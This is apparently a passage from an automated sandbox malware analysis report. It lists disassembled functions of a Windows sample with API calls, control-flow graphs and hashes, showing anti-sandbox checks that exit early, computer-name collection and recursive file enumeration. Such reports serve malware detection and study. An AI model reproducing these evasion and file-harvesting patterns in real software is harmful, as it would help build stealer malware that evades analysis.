                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 05076f31b89b8bd4171d28e9e7c962f5a07143690ee8e57cba7296ea024ae095
                                  • Instruction ID: 1b6541caed6c8641bca87699f7d37da00669ebbdef801893462fe6e710d78c58
                                  • Opcode Fuzzy Hash: 05076f31b89b8bd4171d28e9e7c962f5a07143690ee8e57cba7296ea024ae095
                                  • Instruction Fuzzy Hash: B7012171D00218ABDB10DFA8EC49B9EBBF8EB14320F004166F954E7390DB7459058FD4
                                  Function 00341030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2798 341030-341055 GetCurrentProcess VirtualAllocExNuma 2799 341057-341058 ExitProcess 2798->2799 2800 34105e-34107b VirtualAlloc 2798->2800 2801 341082-341088 2800->2801 2802 34107d-341080 2800->2802 2803 3410b1-3410b6 2801->2803 2804 34108a-3410ab VirtualFree 2801->2804 2802->2801 2804->2803
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00341046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 0034104D
                                  • ExitProcess.KERNEL32 ref: 00341058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0034106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003410AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: a947155df047b7b22b95c3ba2bd4a28110caca89bfc9529835a5dbfcd54345ac
                                  • Instruction ID: fee809cb36f3d0fefbf5a389ac257ac244682bc5079d54090c014138696f6816
                                  • Opcode Fuzzy Hash: a947155df047b7b22b95c3ba2bd4a28110caca89bfc9529835a5dbfcd54345ac
                                  • Instruction Fuzzy Hash: 6701F4717802047BE7204A657C1EF6B77EDA794B05F308014F708E72C0DAB1E944A674
                                  Function 0035EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2805 35ee90-35eeb5 call 342930 2808 35eeb7-35eebf 2805->2808 2809 35eec9-35eecd call 346c40 2805->2809 2808->2809 2810 35eec1-35eec3 lstrcpy 2808->2810 2812 35eed2-35eee8 StrCmpCA 2809->2812 2810->2809 2813 35ef11-35ef18 call 342a20 2812->2813 2814 35eeea-35ef02 call 342a20 call 342930 2812->2814 2820 35ef20-35ef28 2813->2820 2824 35ef45-35efa0 call 342a20 * 10 2814->2824 2825 35ef04-35ef0c 2814->2825 2820->2820 2822 35ef2a-35ef37 call 342930 2820->2822 2822->2824 2829 35ef39 2822->2829 2825->2824 2828 35ef0e-35ef0f 2825->2828 2831 35ef3e-35ef3f lstrcpy 2828->2831 2829->2831 2831->2824
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0035EEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0035EF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: 25e114d1455892bdffe2d1dc116a4a96226cc62bd8aa47f8401da12b9e023e2d
                                  • Instruction ID: 7f68608e1e7481507e7eb4c94fe01c1bb9bc05e39acd4ba6e777c7220ed9e563
                                  • Opcode Fuzzy Hash: 25e114d1455892bdffe2d1dc116a4a96226cc62bd8aa47f8401da12b9e023e2d
                                  • Instruction Fuzzy Hash: 5C21FC316202469BCB27BF78DC46A9B37E4AF14301F455428BC4AEF252DF30F9648BA0
                                  Function 003410C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2886 3410c0-3410cb 2887 3410d0-3410dc 2886->2887 2889 3410de-3410f3 GlobalMemoryStatusEx 2887->2889 2890 3410f5-341106 2889->2890 2891 341112-341114 ExitProcess 2889->2891 2892 341108 2890->2892 2893 34111a-34111d 2890->2893 2892->2891 2894 34110a-341110 2892->2894 2894->2891 2894->2893
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 1ef247d9adbb3dc635a1fc77a50779428fee8c8b7127956c3eb2d10b7ba3e52a
                                  • Instruction ID: 7860309e427e232bbe022a07a34130fb51a5d9971de8af1cde6da769063f1475
                                  • Opcode Fuzzy Hash: 1ef247d9adbb3dc635a1fc77a50779428fee8c8b7127956c3eb2d10b7ba3e52a
                                  • Instruction Fuzzy Hash: 92F05C70128A444BEB516B64EC0A32DF7D8EB14350F100929DE9FCA180E230E8C0E137
                                  Function 00358C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2895 358c88-358cc4 StrCmpCA 2897 358cc6-358cc7 ExitProcess 2895->2897 2898 358ccd-358ce6 2895->2898 2900 358ee2-358eef call 342a20 2898->2900 2901 358cec-358cf1 2898->2901 2902 358cf6-358cf9 2901->2902 2904 358ec3-358edc 2902->2904 2905 358cff 2902->2905 2904->2900 2945 358cf3 2904->2945 2907 358e56-358e64 StrCmpCA 2905->2907 2908 358d30-358d3f lstrlen 2905->2908 2909 358dbd-358dcb StrCmpCA 2905->2909 2910 358ddd-358deb StrCmpCA 2905->2910 2911 358dfd-358e0b StrCmpCA 2905->2911 2912 358e1d-358e2b StrCmpCA 2905->2912 2913 358e3d-358e4b StrCmpCA 2905->2913 2914 358d5a-358d69 lstrlen 2905->2914 2915 358d84-358d92 StrCmpCA 2905->2915 2916 358da4-358db8 StrCmpCA 2905->2916 2917 358d06-358d15 lstrlen 2905->2917 2918 358e6f-358e7d StrCmpCA 2905->2918 2919 358e88-358e9a lstrlen 2905->2919 2907->2904 2927 358e66-358e6d 2907->2927 2931 358d41-358d46 call 342a20 2908->2931 2932 358d49-358d55 call 342930 2908->2932 2909->2904 2920 358dd1-358dd8 2909->2920 2910->2904 2921 358df1-358df8 2910->2921 2911->2904 2922 358e11-358e18 2911->2922 2912->2904 2923 358e31-358e38 2912->2923 2913->2904 2924 358e4d-358e54 2913->2924 2933 358d73-358d7f call 342930 2914->2933 2934 358d6b-358d70 call 342a20 2914->2934 2915->2904 2936 358d98-358d9f 2915->2936 2916->2904 2925 358d17-358d1c call 342a20 2917->2925 2926 358d1f-358d2b call 342930 2917->2926 2918->2904 2928 358e7f-358e86 2918->2928 2929 358ea4-358eb0 call 342930 2919->2929 2930 358e9c-358ea1 call 342a20 2919->2930 2920->2904 2921->2904 2922->2904 2923->2904 2924->2904 2925->2926 2954 358eb3-358eb5 2926->2954 2927->2904 2928->2904 2929->2954 2930->2929 2931->2932 2932->2954 2933->2954 2934->2933 2936->2904 2945->2902 2954->2904 2955 358eb7-358eb9 2954->2955 2955->2904 2956 358ebb-358ebd lstrcpy 2955->2956 2956->2904
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 242a339f7e876638c0382de0775c109ca33a4dac420aa4d0053cee65047cdfdb
                                  • Instruction ID: d4e65c2a472b3d58f4f66b8d3894c7f2460af51e3eea931abbf8aaa2ff27b66e
                                  • Opcode Fuzzy Hash: 242a339f7e876638c0382de0775c109ca33a4dac420aa4d0053cee65047cdfdb
                                  • Instruction Fuzzy Hash: 54E0DFA1A20344FBCB009BA8FC98A867B7CFF11300B014054E90873221DB30AC0ADBA8
                                  Function 00362AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2957 362ad0-362b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 362b44-362b59 2957->2958 2959 362b24-362b36 2957->2959
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00362AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00362B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 62f931f7938da737445c11aa8d70b1cde2966d0a38f5e3a1ee881167263e0243
                                  • Instruction ID: 502a08be5ac2a8b1a182d1b7f06d719dfd699b6323c4fd794df8ae86da5f0b0e
                                  • Opcode Fuzzy Hash: 62f931f7938da737445c11aa8d70b1cde2966d0a38f5e3a1ee881167263e0243
                                  • Instruction Fuzzy Hash: C101D676A44608ABC710CF99ED49B9EF7B8F744B21F00426AF919E3780D774190487B1

                                  Non-executed Functions

                                  Function 00352390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003523D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003523F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00352402
                                  • lstrlen.KERNEL32(\*.*), ref: 0035240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00352436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00352486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: aad919a780cd2e7a5189887421f58173eef76d0a8543afca360e734d0ab23abc
                                  • Instruction ID: 73e036bf96861614040264a201f33e82a78feee2073854e385f413d294e1af02
                                  • Opcode Fuzzy Hash: aad919a780cd2e7a5189887421f58173eef76d0a8543afca360e734d0ab23abc
                                  • Instruction Fuzzy Hash: DAA27D31911616ABCB23AF74DC89EAF77B8AF15301F454024FC09EB261DB34ED599BA0
                                  Function 003416A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003416E2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034176C
                                  • lstrcat.KERNEL32(00000000), ref: 00341776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003417A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003417EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003417F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341875
                                  • lstrcat.KERNEL32(00000000), ref: 0034187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003418AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003418F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003418FE
                                  • lstrlen.KERNEL32(00371794), ref: 00341909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341929
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341966
                                  • lstrlen.KERNEL32(\*.*), ref: 00341971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0034199A
                                    • Part of subcall function 00364040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0036406D
                                    • Part of subcall function 00364040: lstrcpy.KERNEL32(00000000,?), ref: 003640A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003419C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341A16
                                  • lstrlen.KERNEL32(00371794), ref: 00341A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341A41
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341A81
                                  • lstrlen.KERNEL32(00371794), ref: 00341A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341AAC
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00341B45
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 00341B70
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00341B8A
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341C03
                                  • lstrlen.KERNEL32(00371794), ref: 00341C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341C31
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341C74
                                  • lstrlen.KERNEL32(00371794), ref: 00341C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341CA2
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341CAE
                                  • lstrlen.KERNEL32(?), ref: 00341CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341CE9
                                  • lstrlen.KERNEL32(00371794), ref: 00341CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341D14
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341DEB
                                  • lstrlen.KERNEL32(00371794), ref: 00341DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341E19
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341E56
                                  • lstrlen.KERNEL32(00371794), ref: 00341E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341E81
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341E8D
                                  • lstrlen.KERNEL32(?), ref: 00341E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00341F45
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341F9F
                                  • lstrlen.KERNEL32(00FA8858), ref: 00341FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341FE3
                                  • lstrlen.KERNEL32(00371794), ref: 00341FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034200E
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00342042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034204D
                                  • lstrlen.KERNEL32(00371794), ref: 00342058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342075
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00342081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
